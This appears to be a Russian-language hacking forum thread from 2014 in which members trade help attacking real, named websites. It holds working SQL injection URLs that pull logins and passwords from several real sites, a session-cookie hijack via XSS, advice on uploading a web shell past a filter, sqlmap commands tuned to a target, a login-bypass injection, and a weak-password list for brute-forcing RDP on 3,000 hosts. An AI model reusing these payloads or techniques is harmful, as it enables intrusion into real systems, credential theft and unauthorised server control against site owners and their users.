Так проверьте же. Кука может быть не одна, может быть еще на одном домене, может быть привязка к ip. А скорее всего привязка к user-agent'у.
psihoz26
15.01.2014, 02:44
madhatter said:
Так проверьте же. Кука может быть не одна, может быть еще на одном домене, может быть привязка к ip. А скорее всего привязка к user-agent'у.
Немного поэксперементировав я пришел к некому результату но всёже это ещё не результат...
Залогинился в опере, заюзал xss , открыл сниифер - куки уже тут.
Открываю фаерфокс и плагин в нем (Live http replay)
мне нужен был именно он так как очень просто можно заменить все куки запроса
Вобщем открываю главную, ловлю запрос , меняю в нем куки на те что пришли на сниффер, повторяю запрос и вижу что я типо залогинен с почты которая насамом деле открыта у меня в опере.
Конечно же зайти на неё не удалось так как куки переданные плагином не сохранились в браузер.
Переберал все возможные комбинации и оказалось что для этого хватит всего одной куки Mpop и страница также будет показывать что я якобы залогинен.
А если куку Mpop просто сунуть в браузер и сохранить то она умрет и меня попросит ввести пассворд повторно.
Unknowhacker
15.01.2014, 16:55
Народ, помогите вывести таблицы..
Code:
http://bigtoys.com.ua/index.php?route=product/category&path=106+or+1+group+by+concat(version(),floor(rand (0)*%202))having+min(0)+or+1
Unknowhacker said:
Народ, помогите вывести таблицы..
Code:
http://bigtoys.com.ua/index.php?route=product/category&path=106+or+1+group+by+concat(version(),floor(rand (0)*%202))having+min(0)+or+1
SELECT 1 from information_schema.tables group by concat((SELECT table_name from information_schema.tables limit 0,1),floor(rand(0)*2)) having min(0)
kingbeef
16.01.2014, 00:44
Unknowhacker said:
Народ, помогите вывести таблицы..
Code:
http://bigtoys.com.ua/index.php?route=product/category&path=106+or+1+group+by+concat(version(),floor(rand (0)*%202))having+min(0)+or+1
Там фильтруется нижнее подчеркивание.
попугай said:
В Opencart скуля?
Старая. С бородой уже.
zombak18
18.01.2014, 16:12
В общем заюзал на одном сайте Nginx stack-based buffer overflow
Он выдал вот такую инфу
http://clip.corp.mail.ru/clip/m517/1390043557-clip-3kb-hW7udbbSoRgi.png
Как это можно использовать.. Для чего эти байты?
sergei1105
19.01.2014, 00:03
HTTP parameter pollution что за уязвимость?
kingbeef
19.01.2014, 01:18
sergei1105 said:
HTTP parameter pollution что за уязвимость?
Зайди в гугл, ввел HTTP parameter pollution.
Открой первую вкладку http://raz0r.name/articles/http-parameter-pollution и прочитай.
imprenko
19.01.2014, 16:31
приветствую
понять не могу что за база
на "
SearchEngineException: parsefql: Query Error: line 1:100: unexpected token:
,linguistics=off),boost=1000), not(*.swf), not(*filtertable*), not(*multimedia_layer_library*), not(*.flash.html), not(*.isng.*), not(*tabcontent*), not(*Search_Results*), not(*medialibrary*), not(*.ngrb.*), not(*media_library*), not(*.pid.*), not(*.redirect.*),filter(and(language:
")ORDER BY 1
SearchEngineException: parsefql: Query Error: line 1:100: unexpected token: ORDER
")and(select null)
SearchEngineException: parsefql: Query Error: line 1:111: unexpected token: null
хелп..
psihoz26
19.01.2014, 23:35
Посоветуйте пожалуйста нормальный гуи для sqlmap
Особенно важна поддержка иньекций в куках
reuvenmatbil
20.01.2014, 15:29
Подскажите пример реализации
https://www.site.com/login
POST
PARAM: firstN=&lastN=
DB: ORACLE
c чего начать?
psihoz26 said:
Посоветуйте пожалуйста нормальный гуи для sqlmap
Особенно важна поддержка иньекций в куках
В разделе ИЗБРАННОЕ смотрел?
Почему, когда пытаюсь сдампить бд, некоторые поля сохраняются пустыми?
Пробовал Havij и sqlmap
erwap said:
Почему, когда пытаюсь сдампить бд, некоторые поля сохраняются пустыми?
Пробовал Havij и sqlmap
Уверен,что там есть данные?ручками пробовал?
erwap said:
Почему, когда пытаюсь сдампить бд, некоторые поля сохраняются пустыми?
Пробовал Havij и sqlmap
А вы таки вообще уверены, что в записях с этими полями поля по факту не пустые? И какие у вас привилегии на системе?
Unknowhacker
21.01.2014, 18:49
Есть сайт со скулей
Code:
http://kerch.biz/news/view.php?id=-328+union+/*!select*/+1,2,3,concat%28login,0x3a,password%29,5,6+FROM+us ers+--+
и админка (http://kerch.biz/login.php) но ни одна из учёток не подходит. Расскажите, в чём подвог?
2. Не подбирается кол-во столбцов.
Code:
www.tmk-group.com/structure.php?flr_id=179+and+1=0+order+by+1+--+
kingbeef
21.01.2014, 19:11
Unknowhacker said:
Есть сайт со скулей
Code:
http://kerch.biz/news/view.php?id=-328+union+/*!select*/+1,2,3,concat%28login,0x3a,password%29,5,6+FROM+us ers+--+
и
админка (http://kerch.biz/login.php)
но ни одна из учёток не подходит. Расскажите, в чём подвог?
http://kerch.biz/upload.php
Спокойно шелл грузится.
imprenko
22.01.2014, 01:05
подскажите по базе SAP MaxDB
не могу найти статей про это базу как скуль ижект делать в ней.
блинд
Unknowhacker
22.01.2014, 21:37
В общем есть проблемная скуля
Code:
http://www.sevseun.com/downloads.php?page_id=-1075%27+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13 ,14,15,16+--+
На которой видны пинтабельные поля, но получить от них что-либо (нр. version() ) выбивает чистую страницу. Расскажите, что за фигня!
Unknowhacker
23.01.2014, 00:40
OxoTnik said:
http://www.sevseun.com/downloads.php?page_id=-1075%27+union+select+1,2,@@version,4,5,6,7,8,9,10, 11,12,13,14,15,16+--+
http://www.sevseun.com/downloads.php?page_id=-1075%27+union+select+1,2,3,4,tabLe_name,6,7,8,9,10 ,11,12,13,14,15,16++from+information_scheMa.tables--+
// Остальные ответы удалил, так как мы все дублировали этот пост =) Да, там фильтруются скобки
// BigBear
Спасибо ребятулечки, но там другая фигня получилась.
Code:
http://www.sevseun.com/downloads.php?page_id=-1075%27+union+select+1,2,3,4,Column_name,6,7,8,9,1 0,11,12,13,14,15,16+from+information_scheMa.column s+where+table_name=%27users%27+limit+2,1+--+
вообщем есть столбец username & password, но туда не пускает, мб зарегистрироваться надо. А насчёт скобок тоже отдельное спасибо, но можно поочередно вытянуть используя их.
II.
Code:
http://fmf.npi-tu.ru/index.php?id=3+union+select+1,2,3,4,5,6,7,8,9,10,1 1+--+
- не выводит пентабельное поле.
kingbeef
23.01.2014, 01:08
Unknowhacker said:
Спасибо ребятулечки, но там другая фигня получилась.
Code:
http://www.sevseun.com/downloads.php?page_id=-1075%27+union+select+1,2,3,4,Column_name,6,7,8,9,1 0,11,12,13,14,15,16+from+information_scheMa.column s+where+table_name=%27users%27+limit+2,1+--+
вообщем есть столбец username & password, но туда не пускает, мб зарегистрироваться надо. А насчёт скобок тоже отдельное спасибо, но можно поочередно вытянуть используя их.
II.
Code:
http://fmf.npi-tu.ru/index.php?id=3+union+select+1,2,3,4,5,6,7,8,9,10,1 1+--+
- не выводит пентабельное поле.
Зачем регистрироватся, если ты работаешь с БД ?
Table 'sevseun.users' doesn't exist
Нету прав у юзера на доступ к этой таблице.
Unknowhacker
23.01.2014, 01:46
kingbeef said:
Зачем регистрироватся, если ты работаешь с БД ?
Table 'sevseun.users' doesn't exist
Нету прав у юзера на доступ к этой таблице.
Просто у меня были такие случаи на практике, когда после регистрации получалось вытянуть.
kingbeef
23.01.2014, 02:23
Unknowhacker said:
Просто у меня были такие случаи на практике, когда после регистрации получалось вытянуть.
Такого быть не может.
kingbeef said:
Зачем регистрироватся, если ты работаешь с БД ?
Table 'sevseun.users' doesn't exist
Нету прав у юзера на доступ к этой таблице.
Table 'sevseun.users' doesn't exist
Таблицы такой нет вообще, а не нет доступа.
Evil_Genius
23.01.2014, 13:53
Подскажите пожалуйста по вопросу sql inj. Нашел уязвимую админку, хочу создать запрос для проникновения без пароля.
Есть 2 поля: Логин и Пароль
В поле username ввожу '1
В поле password ввожу '2
На что выдает мне:
DB Error: syntax error
SELECT NAME, PASSWORD FROM USER WHERE NAME = ''1' AND state = '0' [nativecode=1064 ** You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '1' AND state = '0'' at line 2]
Далее пробую вставить запрос такого вида в поле username
admin' or '1'='1' AND password='' or '1'='1'
На что выдает следующее:
DB Error: syntax error
SELECT NAME, PASSWORD FROM USER WHERE NAME = 'admin' or '1'='1' AND password='' or '1'='1'' AND state = '0' [nativecode=1064 ** You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '0'' at line 2]
Как правильно составить запрос?
Unknowhacker
23.01.2014, 15:19
Возникло парочку вопросов:
1.
Code:
http://www.nova-plosha.com/index.php?hl=ru&idd=cat&cat=13955%27
- невозможно подобрать кол-во столбцов.
2. Есть место для заливки шелла, но когда заливаешь неизвестно где он пропадает..
Code:
http://kerch.biz/upload/
в категории archive; photos - не обнаружено.
3.
Code:
http://www.auto-alliance.org/item.php?id=6319+And+1=-0+union+select+version%28%29+--+
- не выводится пентабельное поле.
4.
Code:
http://fmf.npi-tu.ru/index.php?id=3+union+select+1,2,3,4,5,6,7,8,9,10,1 1+--+
- аналогично, не выводится пентабельное поле.
kingbeef
23.01.2014, 16:26
попугай said:
Table 'sevseun.users' doesn't exist
Таблицы такой нет вообще, а не нет доступа.
Таблица есть. Из нее вытаскивались колонки.
kingbeef said:
Зачем регистрироватся, если ты работаешь с БД ?
Table 'sevseun.users' doesn't exist
Нету прав у юзера на доступ к этой таблице.
lolwut?
Почему ты утверждаешь, что к таблице нету доступа, когда ошибка говорит об отсутствии таблицы как таковой? MySQL шутник тот еще, шутки шутит, ага.
Таблица находится в другой БД, хакер.
Code:
http://www.sevseun.com/downloads.php?page_id=1075%27+and+0+union+select+1 ,2,3,4,TABLE_SCHEMA,6,7,8,9,10,11,12,13,14,15,16+f rom+information_scheMa.columns+where+table_name=%2 7users%27+limit+0,1--%20a
-- aukro
Code:
http://www.sevseun.com/downloads.php?page_id=1075%27+and+0+union+select+1 ,2,3,4,username,6,7,8,9,10,11,12,13,14,15,16+from+ aukro.users--%20a
kingbeef said:
Таблица есть. Из нее вытаскивались колонки.
...
Unknowhacker said:
Просто у меня были такие случаи на практике, когда после регистрации получалось вытянуть.
Звучит крайне прохладно.
Unknowhacker, что такое "пентабельное поле"? Я могу понять не выговаривать букву "р", но не иметь возможности ее написать это что-то новенькое.
И по поводу http://www.auto-alliance.org/item.php?id=6319+And+1=-0+union+select+version%28%29+--+
Вывод там есть, в ошибке, что ниже. Но на вывод возможны только числовые значения, так еще и определенной длины.
Объяснять более подробно, что там происходит просто впадлу, да и бессмысленно =\
Code:
http://www.auto-alliance.org/item.php?id=6319%20and(0)%20UNION%20SELECT%20hex(m id(user(),1,2))--%20a
http://www.auto-alliance.org/item.php?id=6319%20and(0)%20UNION%20SELECT%20hex(m id(user(),3,2))--%20a
http://www.auto-alliance.org/item.php?id=6319%20and(0)%20UNION%20SELECT%20hex(m id(user(),5,2))--%20a
http://www.auto-alliance.org/item.php?id=6319%20and(0)%20UNION%20SELECT%20hex(m id(user(),7,2))--%20a
Инкриминируем это число на 2, пока не будет нуля и полученные значения записываем (полученные значения будут выводится тут Error loading image: /image2.php?id=[NUM]), потом полученный результат анхексаем и получаем заветные данные.
Доброго времени суток. Есть сайт вида www.site.com/find.jsp?f= попробовал подставить
Code:
">alert('xss')
в исходнике
Code:
alert('xss')"/>
тег не закрылся. Тогда сделал так
Code:
">alert('xss')alert('xss')
, но заветного окошка я так и не увидел, что не так?
nike001 said:
что не так?
Браузер
BigBear said:
Браузер
Всмысле браузер? В настройках Javascript включён.
nike001,
http://forum.antichat.net/showthread.php?t=20140
lіgendо said:
лучше в опере пробовать, хромы и фф режут хсс
M_script said:
Opera 12.x в идеале. Лень объяснять, кто знает - поймет, кто захочет - поверит, остальные - лесом.
Подскажите по sqlmap.
Задача: сдампить определенные колонки в таблице
Code:
python sqlmap.py -u http://site.ru?a=inject --dump -D db_name -T table_name -C column1
В вышеприведенном коде сдампится column1 , а мне нужно еще column2. Как синтаксически правильно дописать вторую колонку?
erwap
-C "column1,column2,column3"
1) http://armtoday.info/Lang=_Ru&mode=allwords&search=%Inject_Here%&SectionID=-1&submit=%d5%88%d6%80%d5%b8%d5%b6%d5%a5%d5%ac
не как не смог сглмапом так же Хавижом( в чем проблема не пойму(
2) aztexnika.az/upload.php
aztexnika.az/admin/upload.php
нужно залить шелл. нужен доступ емаилу с этого сайта(
BigBanMan
25.01.2014, 17:43
Есть уязвимость. SQLi
Предположим так (заменил дабы не палить):
Url: http://www.site.com/threadrate.php?t=104496
Method: post
Param: securitytoken
Payload: "));SELECT+SLEEP(15)/*
Data: securitytoken=guest&t=104496&pp=10&page=1&vote=5
как верно составить запрос sqlmap с payload'ом чтоб было? Нигде в инете ни в документах не найти как сделать свой payload.
А без него уязвимость не видит. Прошу, помогите
BigBanMan said:
Есть уязвимость. SQLi
Предположим так (заменил дабы не палить):
Url: http://www.site.com/threadrate.php?t=104496
Method: post
Param: securitytoken
Payload: "));SELECT+SLEEP(15)/*
Data: securitytoken=guest&t=104496&pp=10&page=1&vote=5
как верно составить запрос sqlmap с payload'ом чтоб было? Нигде в инете ни в документах не найти как сделать свой payload.
А без него уязвимость не видит. Прошу, помогите
Прежде чем говорить - проверьте.
HTML:
sqlmap --help
За payload отвечает две опции:
--prefix=PREFIX Injection payload prefix string
--suffix=SUFFIX Injection payload suffix string
соответственно Ваш запрос будет примерно таким:
PHP:
sqlmap--url="http://www.site.com/threadrate.php?t=104496"--data="securitytoken=guest*&t=104496&pp=10&page=1&vote=5"--prefix="));"--dbms="MySQL"
BigBanMan
25.01.2014, 21:29
Zed0x said:
Прежде чем говорить - проверьте.
HTML:
sqlmap --help
За payload отвечает две опции:
--prefix=PREFIX Injection payload prefix string
--suffix=SUFFIX Injection payload suffix string
соответственно Ваш запрос будет примерно таким:
PHP:
sqlmap--url="http://www.site.com/threadrate.php?t=104496"--data="securitytoken=guest*&t=104496&pp=10&page=1&vote=5"--prefix="));"--dbms="MySQL"
Для начала спасибо вам, попробую.
А так я и вправду видел это, но как это применять в команде не понимал. Тоесть если у меня:
Payload: '"%2bSLEEP(15)--
то команда будет включать
Code:
--prefix=""%2b"
?
2fed said:
1) http://armtoday.info/Lang=_Ru&mode=allwords&search=%Inject_Here%&SectionID=-1&submit=%d5%88%d6%80%d5%b8%d5%b6%d5%a5%d5%ac
не как не смог сглмапом так же Хавижом( в чем проблема не пойму(
Проблема в отсутствии знаний.
http://armtoday.info/default.asp?search=asd')UNION/**/SELECT/**/1,2,version(),4,5,6--%20a&submit=%D0%98%D1%81%D0%BA%D0%B0%D1%82%D1%8C&mode=allwords&SectionID=-1&Lang=_Ru
Tigger said:
Проблема в отсутствии знаний.
http://armtoday.info/default.asp?search=
%Inject_Here%
&submit=%D0%98%D1%81%D0%BA%D0%B0%D1%82%D1%8C&mode=allwords&SectionID=-1&Lang=_Ru
опять ничего(
Что можно сделать с этим: http://rp-gameworld.ru/index.php?c=registration&action=reg
или http://rp-gameworld.ru/?c=search
Tigger said:
Проблема в отсутствии знаний.
http://armtoday.info/default.asp?search=
asd')UNION/**/SELECT/**/1,2,version(),4,5,6--%20a
&submit=%D0%98%D1%81%D0%BA%D0%B0%D1%82%D1%8C&mode=allwords&SectionID=-1&Lang=_Ru
Host IP: 90.156.201.28
Web Server: Microsoft-IIS/8.0у
Powered-by: ASP.NET
Keyword Found: Не
I guess injection type is Integer?! If injection failed, retry with a manual keyword.
DB Server: MySQL
Finding columns count(MySQL,MsSQL 2005): 1
и всё ничего не находит.
kingbeef
26.01.2014, 03:44
2fed said:
Host IP: 90.156.201.28
Web Server: Microsoft-IIS/8.0у
Powered-by: ASP.NET
Keyword Found: Не
I guess injection type is Integer?! If injection failed, retry with a manual keyword.
DB Server: MySQL
Finding columns count(MySQL,MsSQL 2005): 1
и всё ничего не находит.
Не через мозилу открывай.
http://data3.floomby.com/files/share/25_1_2014/23/I6cx0XgckOrVk2uadtk8A.jpg
Tigger said:
Ну раз хавиж не крутит, значит скули там нету, мне показалось.
а что на счет
http://aztexnika.az/uppload.php
http://aztexnika.az/admin/uppload.php
да уж
kingbeef said:
Не через мозилу открывай.
http://data3.floomby.com/files/share/25_1_2014/23/I6cx0XgckOrVk2uadtk8A.jpg
причем тут мозилла ?))
http://armtoday.info/default.asp?search=asd')UNION/**/SELECT/**/1,2,(select/**/unhex(hex(table_name))/**/from/**/information_schema.tables/**/limit/**/0,1),4,5,6-- a&submit=ИÑкать&mode=allwords&SectionID=-1&Lang=_Ru
здравствуйте.
вопрос в следующем. у меня интернет соединение 20кб/с. с таким интернетом дедик юзать не актуально ,как я понимаю(поправьте, если не прав). собственно вопрос, как обезопасить себя. виртуалка? торы? что сделать. простите, на форуме очень много воды, искать нужную информацию просто нет времени.
BigBanMan
26.01.2014, 12:35
Ребята, прошу, скажите что такое payload и как его задать в ручную в sqlmap(
Если Payload: '"%2bSLEEP(15)--
То --prefix=""%2b"
Так? если так то не идет всеравно
BigBanMan said:
Ребята, прошу, скажите что такое payload и как его задать в ручную в sqlmap(
Если Payload: '"%2bSLEEP(15)--
То --prefix=""%2b"
Так? если так то не идет всеравно
Тебе дали готовый запрос к sqlmap, просто скопируй и вставь в терминал.
BigBanMan
26.01.2014, 14:36
Zed0x said:
Тебе дали готовый запрос к sqlmap, просто скопируй и вставь в терминал.
Я бы не просил объяснить если работало бы. Дело в том что и не получается.
Facecontrol
27.01.2014, 19:24
как найти полный путь к корню сайта
nemaniak
27.01.2014, 19:40
Facecontrol said:
как найти полный путь к корню сайта
phpinfo, ошибки php, подбор пути, исходя из параметров сервера
Oro4imaru
27.01.2014, 23:57
возможно ли провести иньекцыю в запросе
SELECT DISTINCT forum.title from forum AS
forum WHERE forumid IN (2)
ошибка получается в запросе
SELECT DISTINCT forum.title from forum AS
forum WHERE forumid IN (2')
дайте напутствие господа форумчане заранее благодарен
winstrool
28.01.2014, 00:41
Oro4imaru said:
возможно ли провести иньекцыю в запросе
ошибка получается в запросе
дайте напутствие господа форумчане заранее благодарен
Да, надо только закончить логическую структуру запроса!
К примеру:
SELECT DISTINCT forum.title from forum AS
forum WHERE forumid IN (2) and 1=1 -- )
В админке есть заливка файлов, надо залить шелл. При попытке залить походу срабатывает что-то типо антивирусника или фаервола(заливаю чистый пхп с шеллом-не льется, заливаю пхп файл с phpinfo() - все спокойно выдает).
Че делать?
ph1l1ster
28.01.2014, 10:58
Cherep said:
В админке есть заливка файлов, надо залить шелл. При попытке залить походу срабатывает что-то типо антивирусника или фаервола(заливаю чистый пхп с шеллом-не льется, заливаю пхп файл с phpinfo() - все спокойно выдает).
Че делать?
попробуй залить
или passthru(), или exec() вместо system()
будет доступен:
shell.php?cmd=uname
Знаю, что вопрос немного не по теме, но подходящей я не нашёл.
Есть ли шанс сбрутить дедик с логинами
Code:
Administrator
admin
и пасами
Code:
administrator
admin
password
pass
p@ssword
passw0rd
p@ssw0rd
1
12
123
1234
12345
123456
0
00
000
0000
00000
support
123456
У меня 3000 ip-шников. Или словарь надо больше и я впустую потрачу время?
Cherep said:
В админке есть заливка файлов, надо залить шелл. При попытке залить походу срабатывает что-то типо антивирусника или фаервола(заливаю чистый пхп с шеллом-не льется, заливаю пхп файл с phpinfo() - все спокойно выдает).
Че делать?
Вопрос все еще интересен, совет юзера выше не помог
выдает при таком коде вот что:
Code:
Warning: system() [function.system]: Cannot execute a blank command in тутпуть/wso2.php on line 1
nike001 said:
Знаю, что вопрос немного не по теме, но подходящей я не нашёл.
Есть ли шанс сбрутить дедик с логинами
Code:
Administrator
admin
и пасами
Code:
administrator
admin
password
pass
p@ssword
passw0rd
p@ssw0rd
1
12
123
1234
12345
123456
0
00
000
0000
00000
support
123456
У меня 3000 ip-шников. Или словарь надо больше и я впустую потрачу время?
3000 адресов? Как по-вашему, сколько из них будут живы? На скольких из них будет винда? На скольких из них будет открыт rdp? А на скольких будет такой пароль?
ну их 200, которые я проверил были все живые, но ни к одному пароль не подошел. Можете подсказать словарь с оптимальным соотношением размер/качество. APPS у меня 5.
vBulletin® v3.8.14, Copyright ©2000-2026, vBulletin Solutions, Inc. Перевод: zCarot